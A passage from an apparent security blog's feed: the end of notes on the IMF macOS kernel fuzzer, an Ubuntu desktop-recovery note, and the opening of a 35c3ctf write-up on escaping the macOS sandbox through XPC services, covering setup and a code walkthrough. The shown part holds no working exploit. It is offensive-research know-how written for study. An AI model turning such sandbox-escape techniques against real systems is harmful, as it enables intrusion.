class="line">&#125;</span><br></pre></td></tr></table></figure><h4 id="b-变异策略">b. 变异策略</h4><p>变异策略较为简略，只有参数值变异：对其进行数据上的变异。</p><p>这些变异代码都是预先写死在 python 文件中，作为代码模板的一部分，以下是简单的代码模板示例：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">uint16_t</span> <span class="title">mut_short</span><span class="params">(<span class="type">uint16_t</span> v)</span></span>&#123;</span><br><span class="line">  <span class="type">uint16_t</span> r ;</span><br><span class="line">  <span class="keyword">if</span>( MAYBE )&#123;</span><br><span class="line">    r= <span class="built_in">get_rand</span>();</span><br><span class="line">    <span class="keyword">if</span>(bitlen &lt;<span class="number">16</span>)&#123;</span><br><span class="line">      <span class="keyword">return</span> v ^ (r &amp; ((<span class="number">1</span> &lt;&lt; (<span class="number">16</span>-bitlen))<span class="number">-1</span>) ); </span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">      <span 
class="keyword">return</span> v ^ (r &amp; <span class="number">1</span>) ;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> v;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">uint32_t</span> <span class="title">mut_int</span><span class="params">(<span class="type">uint32_t</span> v)</span></span>&#123;</span><br><span class="line">  <span class="type">uint32_t</span> r =<span class="number">0</span>;</span><br><span class="line">  <span class="keyword">if</span>( MAYBE )&#123;</span><br><span class="line">    r = (r&lt;&lt;<span class="number">16</span>) | (<span class="type">uint32_t</span>) <span class="built_in">get_rand</span>();</span><br><span class="line">    r = (r&lt;&lt;<span class="number">16</span>) | (<span class="type">uint32_t</span>) <span class="built_in">get_rand</span>();</span><br><span class="line">    <span class="keyword">if</span>(bitlen &lt;<span class="number">32</span>)&#123;</span><br><span class="line">      <span class="keyword">return</span> v ^ (r &amp; ((<span class="number">1</span> &lt;&lt; (<span class="number">32</span>-bitlen))<span class="number">-1</span>) ); </span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">      <span class="keyword">return</span> v ^ (r &amp; <span class="number">1</span>) ;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> v;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="五、评估">五、评估</h2><ul><li><p>IMF 在 macOS 中找到了相当多的 kernel panic 样例。其中大部分是 DoS，有一些可以尝试进行利用。</p></li><li><p>对于不同类型的目标程序，其能起到 fuzz 的效果是不同的。这是因为不同类型的目标程序，所调用的 IOKit 函数侧重点也不相同。</p><p><img src="/2022/01/IMF/image-20220121184714950.png" 
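alt="image-20220121184714950"></p><p>The figure shows that the API logs produced by Game-type target programs, once read by IMF and used to fuzz macOS, triggered the most kernel panics, yet this program type is not the one that achieves the broadest kernel coverage. It also shows that IMF depends heavily on the API logs collected while running the target programs.</p></li><li><p>IMF's precision is affected by N. Fuzzing precision fluctuates somewhat for different values of N:</p><p><img src="/2022/01/IMF/image-20220121185131190.png" alt="image-20220121185131190"></p></li></ul><h2 id="六、不足之处">VI. Limitations</h2><ul><li>IMF is built around <strong>syscall APIs whose argument types are well defined</strong>. It focuses on mutating arguments in a black-box fashion and has no knowledge of each argument's valid memory range.</li><li>IMF presupposes knowledge of each system call's specification, which does not suit drivers: driver arguments are mostly passed as <code>void*</code>, and IMF cannot establish explicit data-flow dependences from such untyped pointers.</li></ul>]]></content>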
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
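&lt;p&gt;Calls to kernel API functions mostly depend on one another: some API calls rely on context produced by other API calls. If the supplied calling context is invalid, the kernel API keeps failing and execution never reaches the deeper logic.&lt;/p&gt;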
&lt;/li&gt;
&lt;li&gt;
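&lt;p&gt;This paper proposes a new kernel fuzzing approach. It uses the dependencies between kernel API functions (that is, the similarity among API call sequences) to infer a dependency model, then uses that model to generate &lt;strong&gt;random yet well-structured API sequences&lt;/strong&gt; for deeper fuzzing.&lt;/p&gt;
&lt;p&gt;API call dependencies come in two kinds:&lt;/p&gt;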
&lt;ol&gt;
&lt;li&gt;Ordering dependence: function A should be called before function B.&lt;/li&gt;
&lt;li&gt;Data dependence: data flows from one function call to another.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;The main fuzzing target is &lt;strong&gt;IOKit Lib&lt;/strong&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;IMF src - &lt;a href=&quot;https://github.com/SoftSec-KAIST/IMF&quot;&gt;github&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;Note that this paper dates from 2017 and its experiments used macOS 10.12.3, whereas my machine runs macOS 12.0.1, so reproducing the experiments involves some difficulties.&lt;/p&gt;
&lt;/blockquote&gt;</summary>
    
    
    
    <category term="论文阅读" scheme="https://kiprey.github.io/categories/%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="fuzz" scheme="https://kiprey.github.io/tags/fuzz/"/>
    
  </entry>
  
  <entry>
    <title>Notes on Restoring the Ubuntu Graphical Interface</title>
    <link href="https://kiprey.github.io/2022/01/ubuntu_desktop_recover/"/>
    <id>https://kiprey.github.io/2022/01/ubuntu_desktop_recover/</id>
    <published>2022-01-17T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.169Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、背景">一、背景</h2><p>给 npy 安装环境时，误删了她的 ubuntu python3，导致重启 ubuntu 后无法进入图形界面，花了两个小时的时间才解决。</p><p>这里简单记录一下恢复图形界面的操作。</p><span id="more"></span><h2 id="二、图形界面恢复">二、图形界面恢复</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">################# 尝试联网 #################</span></span><br><span class="line"><span class="comment"># 命令行界面默认不联网，因此需要手动连网</span></span><br><span class="line"><span class="built_in">sudo</span> dhclient eth0</span><br><span class="line"><span class="comment"># 失败的话，查看网卡名称</span></span><br><span class="line">dmesg | grep eth</span><br><span class="line"><span class="comment"># 发现eth0被重命名成了exxx0，重新联网</span></span><br><span class="line"><span class="built_in">sudo</span> dhclient exxx0</span><br><span class="line"></span><br><span class="line"><span class="comment">################# 配置终端中文支持 #################</span></span><br><span class="line"><span class="comment"># 下载zhcon</span></span><br><span class="line"><span class="built_in">sudo</span> apt-get install zhcon    </span><br><span class="line"><span class="comment"># 设置UTF8编码</span></span><br><span class="line"><span class="built_in">sudo</span> zhcon 
--utf8                          </span><br><span class="line"></span><br><span class="line"><span class="comment">################# 修补其余的依赖 #################</span></span><br><span class="line"><span class="comment"># 先修补其余的依赖，通常正常情况下这里是不会有什么包需要额外安装的</span></span><br><span class="line"><span class="built_in">sudo</span> apt-get update  </span><br><span class="line"><span class="built_in">sudo</span> dpkg --configure -a </span><br><span class="line"><span class="built_in">sudo</span> apt-get install --fix-missing</span><br><span class="line"></span><br><span class="line"><span class="comment">################# 重新安装图形界面 #################</span></span><br><span class="line"><span class="built_in">sudo</span> apt-get install --reinstall ubuntu-desktop </span><br><span class="line"><span class="comment"># 安装完成后将会自动加载图形界面</span></span><br></pre></td></tr></table></figure><p>如果仍然不行，则继续执行以下命令试试：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get install ubuntu-minimal ubuntu-standard ubuntu-desktop</span><br><span class="line"><span class="built_in">sudo</span> apt install nautilus-extension-gnome-terminal</span><br><span class="line"><span class="built_in">sudo</span> reboot</span><br></pre></td></tr></table></figure><h2 id="三、网络连接恢复">三、网络连接恢复</h2><ol><li><p>首先，设置 <code>/etc/NetworkManager/NetworkManager.conf</code> 中的 <code>managed</code> 选项为 true，由图形界面的网络管理器 NetworkManager 来接管网络连接。</p><blockquote><p>注意 Network Manager 是 Desktop 版本下的网络管理器；而 /etc/network/interfaces 是 Server 版本下的网络管理器。</p><p><strong>二者不可同时使用！</strong></p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[ifupdown]</span><br><span class="line">managed=<span 
class="literal">true</span></span><br></pre></td></tr></table></figure></li><li><p>Next, back up and empty the file <code>/usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf</code>, then restart the Network Manager service.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> <span class="built_in">mv</span> /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf  /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf_orig</span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">touch</span> /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf</span><br><span class="line"></span><br><span class="line"><span class="built_in">sudo</span> service network-manager restart</span><br></pre></td></tr></table></figure><p>At this point ifconfig lists the wired interface, and nmcli also shows it as <strong>connected to the wired connection</strong>. Pinging 114.114.114.114 works, but <strong>no hostname can be resolved</strong>.</p></li><li><p>Click <strong>Wired Network</strong> in the top-right corner of the Ubuntu desktop, manually set the DNS server to <code>114.114.114.114</code>, then restart the Network Manager service from a terminal.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> service network-manager restart</span><br></pre></td></tr></table></figure></li></ol><h2 id="四、参考链接">IV. References</h2><ul><li><p><a href="https://blog.csdn.net/dragonstrong/article/details/120739061">ubuntu误删图形界面一直进tty - CSDN</a></p></li><li><p><a href="https://blog.csdn.net/weixin_39585035/article/details/110626057">ubuntu 卸载python后无法进入图形界面_解决Ubuntu删除/升级Python无法进入桌面以及控制台乱码问题… - CSDN</a></p></li><li><p><a href="https://blog.csdn.net/codingpy/article/details/103144663">删除系统 Python 引发的惨案 - CSDN</a></p></li><li><p><a 
href="https://askubuntu.com/questions/882806/ethernet-device-not-managed">Ethernet device not managed - askubuntu</a></p></li></ul>]]></content>
    
    
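    <summary type="html">&lt;h2 id=&quot;一、背景&quot;&gt;I. Background&lt;/h2&gt;
&lt;p&gt;While setting up an environment for my girlfriend, I accidentally removed python3 from her Ubuntu install. After a reboot, Ubuntu could no longer reach the graphical interface, and it took two hours to fix.&lt;/p&gt;
&lt;p&gt;This post is a brief record of the steps used to restore the graphical interface.&lt;/p&gt;</summary>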
    
    
    
    
  </entry>
  
  <entry>
    <title>35c3ctf pillow Writeup</title>
    <link href="https://kiprey.github.io/2022/01/35c3ctf_pillow/"/>
    <id>https://kiprey.github.io/2022/01/35c3ctf_pillow/</id>
    <published>2022-01-07T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.730Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><ul><li><p><code>pillow</code> is a 35c3ctf challenge about escaping the macOS sandbox through bootstrap services. I use it here to get a better understanding of the macOS XPC and sandbox mechanisms.</p></li><li><p>The challenge ships two custom macOS system services. The attacker has to hijack the IPC connection between the two XPC services in order to escape the sandbox.</p></li><li><p>Challenge link: <a href="https://github.com/saelo/35c3ctf/tree/master/pillow">pillow - 35c3ctf github</a></p></li></ul><span id="more"></span><h2 id="二、环境搭建">II. Environment Setup</h2><p>On macOS:</p><ul><li><p>Build (optionally add the <code>-g -O0</code> compiler flags to the Makefile beforehand)</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> git@github.com:saelo/35c3ctf.git</span><br><span class="line"><span class="built_in">cd</span> 35c3ctf/pillow/capsd</span><br><span class="line">make</span><br><span class="line"><span class="built_in">cd</span> ../shelld</span><br><span class="line">make</span><br></pre></td></tr></table></figure></li><li><p>Start the two compiled services with launchd</p><ul><li><p>First, edit the two plists in <code>distrib/System/Library/LaunchDaemons/</code> and replace the <code>Program</code> entry in each with the path of the corresponding compiled XPC service binary. For example:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">[...]</span><br><span class="line">&lt;key&gt;Program&lt;/key&gt;</span><br><span class="line">&lt;string&gt;/Users/kiprey/Desktop/CTF/35c3ctf/pillow/capsd/capsd&lt;/string&gt;</span><br><span class="line">[...]</span><br></pre></td></tr></table></figure></li><li><p>Then have launchd start the two services</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td 
class="code"><pre><span class="line"><span class="built_in">sudo</span> <span class="built_in">chown</span> root:wheel pillow/distrib/System/Library/LaunchDaemons/*.plist</span><br><span class="line"><span class="built_in">sudo</span> launchctl bootstrap system pillow/distrib/System/Library/LaunchDaemons/*.plist</span><br></pre></td></tr></table></figure></li><li><p>To stop the services, run</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> launchctl bootout system pillow/distrib/System/Library/LaunchDaemons/*.plist</span><br></pre></td></tr></table></figure></li></ul><blockquote><p>launchd's output can be viewed with <code>log show --predicate 'processID == 1' --last 1h</code>.</p></blockquote></li><li><p>Set up the environment for running the exploit</p><p>The challenge states that the exploit runs <strong>inside a sandbox</strong>, so the same setup is reproduced here.</p><ul><li><p>First, locate the sandbox profile used for the exploit, at <code>pillow/exploit/exploit.sb</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">(version <span class="number">1</span>)</span><br><span class="line">(deny <span class="keyword">default</span>)</span><br><span class="line"></span><br><span class="line">(<span class="keyword">import</span> <span class="string">&quot;system.sb&quot;</span>)</span><br><span class="line"></span><br><span class="line">; <span class="function">TODO enter correct path <span class="title">here</span></span></span><br><span class="line"><span class="function"><span class="params">(allow process-exec (literal (param 
<span class="string">&quot;EXPLOIT_BIN&quot;</span>)))</span></span></span><br><span class="line"><span class="function"><span class="params">(allow process-fork)</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"><span class="params">(allow mach-lookup (global-name <span class="string">&quot;net.saelo.shelld&quot;</span>))</span></span></span><br><span class="line"><span class="function"><span class="params">(allow mach-lookup (global-name <span class="string">&quot;net.saelo.capsd&quot;</span>))</span></span></span><br><span class="line"><span class="function"><span class="params">(allow mach-lookup (global-name <span class="string">&quot;net.saelo.capsd.xpc&quot;</span>))</span></span></span><br></pre></td></tr></table></figure><p>This sandbox profile only allows <strong>fork</strong>, <strong>exec of the exploit binary</strong>, and <strong>mach lookup</strong> of the three services provided by the challenge.</p></li><li><p>Then run the exploit with the following command</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Note: the EXPLOIT_BIN path passed in must be an **absolute** path</span></span><br><span class="line">sandbox-exec -f ./exploit.sb -D EXPLOIT_BIN=/Users/kiprey/Desktop/CTF/35c3ctf/pillow/exploit/myexploit ./myexploit</span><br></pre></td></tr></table></figure><p>With this in place, an operation that violates the sandbox restrictions is denied:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span 
class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+] Try running /bin/ls, this operation must be denied!\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span> path[] = <span class="string">&quot;/bin/ls&quot;</span>;</span><br><span class="line">    <span class="type">char</span> arg1[] = <span class="string">&quot;/&quot;</span>;</span><br><span class="line">    <span class="type">char</span> * <span class="type">const</span> exec_argv [] = &#123; path, arg1, <span class="literal">NULL</span> &#125;;</span><br><span class="line">    <span class="type">char</span> * <span class="type">const</span> exec_env [] = &#123; <span class="literal">NULL</span> &#125;;</span><br><span class="line">    <span class="built_in">execve</span>(path, exec_argv, exec_env);</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">perror</span>(<span class="string">&quot;myexploit-execve&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Result:</p><p><img src="/2022/01/35c3ctf_pillow/image-20220108155133031.png" alt="image-20220108155133031"></p></li></ul></li><li><p>Set the flag's 
ownership and mode so that ordinary users cannot read it (optional). This step is only a simple test and has no practical significance.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> <span class="built_in">chown</span> root:wheel ./flag</span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">chmod</span> 640 ./flag</span><br></pre></td></tr></table></figure><p>Note, however, that <strong>daemons started by launchd can still read this restricted flag</strong>.</p><p>The following code verifies this:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">FILE* flag = <span class="built_in">fopen</span>(<span class="string">&quot;/Users/kiprey/Desktop/CTF/35c3ctf/pillow/flag&quot;</span>, <span class="string">&quot;r&quot;</span>);</span><br><span class="line"><span class="type">char</span> buf[<span class="number">100</span>] = &#123; <span class="number">0</span> &#125;;</span><br><span class="line"><span class="type">size_t</span> len = <span class="built_in">fread</span>(buf, <span class="number">1</span>, <span class="built_in">sizeof</span>(buf) - <span class="number">1</span>, flag);</span><br><span class="line"><span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;flag read len: %zu, flag: [%&#123;public&#125;s]&quot;</span>, len, buf);</span><br></pre></td></tr></table></figure><p>Log output:</p><p><img src="/2022/01/35c3ctf_pillow/image-20220106234900069.png" alt="image-20220106234900069"></p></li></ul><h2 id="三、代码研究">III. Code Walkthrough</h2><h3 id="1-capsd">1. capsd</h3><p>Let's start with a quick look at the MIG interface.</p><h4 id="a-capsd-defs">a. 
capsd.defs</h4><p>The file is short:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">subsystem capsd <span class="number">733100</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/std_types.defs&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach_types.defs&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach_debug/mach_debug_types.defs&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> <span class="string">&quot;../common/types.h&quot;</span>;</span><br><span class="line"></span><br><span class="line">type string = c_string[*:<span class="number">1024</span>];</span><br><span class="line"></span><br><span class="line"><span class="function">routine <span class="title">grant_capability</span><span class="params">(server: <span class="type">mach_port_t</span>; ServerAuditToken token: <span class="type">audit_token_t</span>; target: <span class="type">audit_token_t</span>; operation: string; arg: string)</span></span>;</span><br><span class="line"><span class="function">routine <span class="title">has_capability</span><span class="params">(server: <span class="type">mach_port_t</span>; pid: <span class="type">int</span>; operation: string; arg: string; out result: <span 
class="type">int</span>)</span></span>;</span><br></pre></td></tr></table></figure><p>Only two routines are defined here: <code>grant_capability</code> and <code>has_capability</code>. A client can call them remotely, and the calls are dispatched to the implementations on the server.</p><h4 id="b-capsd-c">b. capsd.c</h4><h5 id="1-capsd-main-函数">1) The capsd main function</h5><ul><li><p>On startup, capsd first logs a message indicating that the daemon has started running:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;net.saelo.capsd starting&quot;</span>);</span><br></pre></td></tr></table></figure><p>This message is not that easy to get at, though. We first need to obtain capsd's pid from the launchd log (launchd is pid 1):</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">log</span> show --predicate <span class="string">&#x27;processID == 1&#x27;</span> --last 1h | grep <span class="string">&quot;capsd&quot;</span></span><br><span class="line"></span><br><span class="line">[...]</span><br><span class="line"></span><br><span class="line">2022-01-05 17:00:03.199483+0800 0x7c716    Default     0x0                  1      0    launchd: [net.saelo.capsd:] This service is defined to be constantly running and is inherently inefficient.</span><br><span class="line">2022-01-05 17:00:03.199525+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd:] 
internal event: WILL_SPAWN, code = 0</span><br><span class="line">2022-01-05 17:00:03.199537+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd:] service state: spawn scheduled</span><br><span class="line">2022-01-05 17:00:03.199539+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd:] service state: spawning</span><br><span class="line">2022-01-05 17:00:03.199626+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd:] launching: speculative</span><br><span class="line">2022-01-05 17:00:03.200004+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] xpcproxy spawned with pid 32099</span><br><span class="line">2022-01-05 17:00:03.200033+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] internal event: SPAWNED, code = 0</span><br><span class="line">2022-01-05 17:00:03.200035+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] service state: xpcproxy</span><br><span class="line">2022-01-05 17:00:03.200138+0800 0x7c716    Default     0x0                  1      0    launchd: [system:] Bootstrap by launchctl[32098] <span class="keyword">for</span> /Users/kiprey/Desktop/CTF/35c3ctf/pillow/distrib/System/Library/LaunchDaemons/net.saelo.capsd.plist succeeded (0: )</span><br><span class="line">2022-01-05 17:00:03.200197+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] internal event: SOURCE_ATTACH, code = 0</span><br><span class="line">2022-01-05 17:00:03.202699+0800 0x7c8af    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] service state: running</span><br><span class="line">2022-01-05 17:00:03.202725+0800 0x7c8af    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] 
internal event: INIT, code = 0</span><br><span class="line">2022-01-05 17:00:03.202730+0800 0x7c8af    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] Successfully spawned capsd[32099] because speculative</span><br></pre></td></tr></table></figure><p>From this output, capsd's pid is clearly <code>32099</code>, so we run the following command to view that process's log:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">log</span> show --predicate <span class="string">&#x27;processID == 32099&#x27;</span> --last 1h</span><br><span class="line"></span><br><span class="line">Filtering the <span class="built_in">log</span> data using <span class="string">&quot;processIdentifier == 32099&quot;</span></span><br><span class="line">Skipping info and debug messages, pass --info and/or --debug to include.</span><br><span class="line">Timestamp                       Thread     Type        Activity             PID    TTL  </span><br><span class="line">2022-01-05 17:00:03.205538+0800 0x7c8bc    Default     0x0                  32099  0    capsd: net.saelo.capsd starting</span><br><span class="line">--------------------------------------------------------------------------------------------------------------------</span><br><span class="line">Log      - Default:          1, Info:                0, Debug:             0, Error:          0, Fault:          0</span><br><span class="line">Activity - Create:           0, Transition:          0, Actions:           0</span><br></pre></td></tr></table></figure><p>capsd's output is read successfully.</p></li><li><p>Next, capsd creates an <strong>empty CFDictionary</strong> with default parameters:</p><figure 
class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">capabilities_by_pid = <span class="built_in">CFDictionaryCreateMutable</span>(kCFAllocatorDefault, <span class="number">0</span>, &amp;kCFTypeDictionaryKeyCallBacks, &amp;kCFTypeDictionaryValueCallBacks);</span><br></pre></td></tr></table></figure><blockquote><p>Note that <strong>this dictionary is a global variable</strong>, so it is also used in other contexts.</p></blockquote></li><li><p>After that, capsd obtains the bootstrap port and checks in the reverse-DNS-style name <strong>“net.saelo.capsd”</strong> with the bootstrap server, so that other processes can look it up:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">mach_port_t</span> bootstrap_port, service_port;</span><br><span class="line"><span class="built_in">task_get_special_port</span>(<span class="built_in">mach_task_self</span>(), TASK_BOOTSTRAP_PORT, &amp;bootstrap_port);</span><br><span class="line"></span><br><span class="line">kr = <span class="built_in">bootstrap_check_in</span>(bootstrap_port, <span class="string">&quot;net.saelo.capsd&quot;</span>, &amp;service_port);</span><br><span class="line"><span class="built_in">ASSERT_MACH_SUCCESS</span>(kr, <span class="string">&quot;bootstrap_check_in&quot;</span>);</span><br></pre></td></tr></table></figure><p>The next step is slightly more involved. It designates <code>capsd_server</code> as the handler for Mach messages arriving on service_port, that is, events on service_port are <strong>dispatched to</strong> <code>capsd_server</code> for processing. It then starts dispatching Mach events asynchronously:</p><blockquote><p>Note that <code>MIG</code> generates the rest of the Mach message-handling code here, hiding the internal details of Mach communication.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 
class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">dispatch_source_t</span> source = <span class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_MACH_RECV, service_port, <span class="number">0</span>, <span class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line"></span><br><span class="line"><span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span class="line">    <span class="built_in">dispatch_mig_server</span>(source, MAX_MSG_SIZE, capsd_server);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="built_in">dispatch_resume</span>(source);</span><br></pre></td></tr></table></figure></li><li><p>Besides the Mach message server, capsd also sets up an XPC service:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 